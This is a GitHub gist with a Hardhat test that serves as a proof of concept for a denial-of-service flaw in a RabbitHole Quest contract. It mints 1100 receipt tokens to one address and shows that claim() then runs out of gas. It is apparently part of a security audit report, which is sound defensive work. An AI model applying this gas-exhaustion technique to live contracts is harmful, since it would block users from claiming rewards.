-
-
Save carlitox477/85e37d26c6f810304c849c93235ee99e to your computer and use it in GitHub Desktop.
POC: DOS risk if enough tokens are minted in Quest.claim
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import { expect } from 'chai' | |
| import { ethers, upgrades } from 'hardhat' | |
| import { SignerWithAddress } from '@nomiclabs/hardhat-ethers/signers' | |
| import { | |
| Erc1155Quest__factory, | |
| RabbitHoleReceipt__factory, | |
| SampleErc1155__factory, | |
| Erc1155Quest, | |
| SampleErc1155, | |
| RabbitHoleReceipt, | |
| } from '../typechain-types' | |
| describe('POC: claim DOS',()=>{ | |
| const mockAddress = '0x0000000000000000000000000000000000000000' | |
| const questId = 'asdf' | |
| // Modification for POC | |
| const totalRewards = 1000 | |
| const rewardId = 1 | |
| let deployedQuestContract: Erc1155Quest | |
| let deployedSampleErc1155Contract: SampleErc1155 | |
| let deployedRabbitholeReceiptContract: RabbitHoleReceipt | |
| let expiryDate: number, startDate: number | |
| let owner: SignerWithAddress | |
| let firstAddress: SignerWithAddress | |
| let secondAddress: SignerWithAddress | |
| let thirdAddress: SignerWithAddress | |
| let fourthAddress: SignerWithAddress | |
| let questContract: Erc1155Quest__factory | |
| let sampleERC1155Contract: SampleErc1155__factory | |
| let rabbitholeReceiptContract: RabbitHoleReceipt__factory | |
| const deployRabbitholeReceiptContract = async () => { | |
| const ReceiptRenderer = await ethers.getContractFactory('ReceiptRenderer') | |
| const deployedReceiptRenderer = await ReceiptRenderer.deploy() | |
| await deployedReceiptRenderer.deployed() | |
| // RabbitHoleReceipt | |
| deployedRabbitholeReceiptContract = (await upgrades.deployProxy(rabbitholeReceiptContract, [ | |
| deployedReceiptRenderer.address, | |
| owner.address, | |
| owner.address, | |
| 10, | |
| ])) as RabbitHoleReceipt | |
| } | |
| const deploySampleErc20Contract = async () => { | |
| // SampleErc1155 | |
| deployedSampleErc1155Contract = await sampleERC1155Contract.deploy() | |
| await deployedSampleErc1155Contract.deployed() | |
| } | |
| const deployQuestContract = async () => { | |
| deployedQuestContract = await questContract.deploy( | |
| deployedSampleErc1155Contract.address, // rewardTokenAddress_ | |
| expiryDate, // endTime_ | |
| startDate, // startTime_ | |
| totalRewards, //totalParticipants_ | |
| rewardId, //rewardAmountInWeiOrTokenId_ | |
| questId, //questId_ | |
| deployedRabbitholeReceiptContract.address //receiptContractAddress_ | |
| ) | |
| await deployedQuestContract.deployed() | |
| } | |
| const transferRewardsToDistributor = async () => { | |
| await deployedSampleErc1155Contract.safeTransferFrom( | |
| owner.address, // From | |
| deployedQuestContract.address, // to | |
| rewardId, // ID | |
| 1000, // Amount | |
| '0x00' //data | |
| ) | |
| } | |
| beforeEach(async () => { | |
| const [local_owner, local_firstAddress, local_secondAddress, local_thirdAddress, local_fourthAddress] = await ethers.getSigners() | |
| questContract = await ethers.getContractFactory('Erc1155Quest') | |
| sampleERC1155Contract = await ethers.getContractFactory('SampleErc1155') | |
| rabbitholeReceiptContract = await ethers.getContractFactory('RabbitHoleReceipt') | |
| owner = local_owner | |
| firstAddress = local_firstAddress | |
| secondAddress = local_secondAddress | |
| thirdAddress = local_thirdAddress | |
| fourthAddress = local_fourthAddress | |
| expiryDate = Math.floor(Date.now() / 1000) + 10000 | |
| startDate = Math.floor(Date.now() / 1000) + 1000 | |
| await deployRabbitholeReceiptContract() | |
| await deploySampleErc20Contract() | |
| await deployQuestContract() | |
| await transferRewardsToDistributor() | |
| }) | |
| it('POC: Too much rewards to claim', async () => { | |
| // Mint 1000 ERC1155 tokens to owner | |
| for(let i = 0; i <1100; i++){ | |
| await deployedRabbitholeReceiptContract.mint(owner.address, questId) | |
| } | |
| // Start quest | |
| /* | |
| console.log(`Participants: ${await deployedQuestContract.totalParticipants()}`) | |
| console.log(`Owner balance: ${await deployedSampleErc1155Contract.balanceOf(owner.address, rewardId)}`) | |
| console.log(`Quest balance: ${await deployedSampleErc1155Contract.balanceOf(deployedQuestContract.address, rewardId)}`) | |
| */ | |
| await deployedQuestContract.start() | |
| await ethers.provider.send('evm_increaseTime', [86400]) | |
| //console.log(`Owner balance: ${await deployedSampleErc1155Contract.balanceOf(owner.address, rewardId)}`) | |
| const totalTokens = await deployedRabbitholeReceiptContract.getOwnedTokenIdsOfQuest(questId, owner.address) | |
| //console.log(`User total receipt tokens: ${totalTokens.length}`) | |
| await expect(deployedQuestContract.claim()).to.be.rejectedWith("Transaction ran out of gas") | |
| }) | |
| }) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment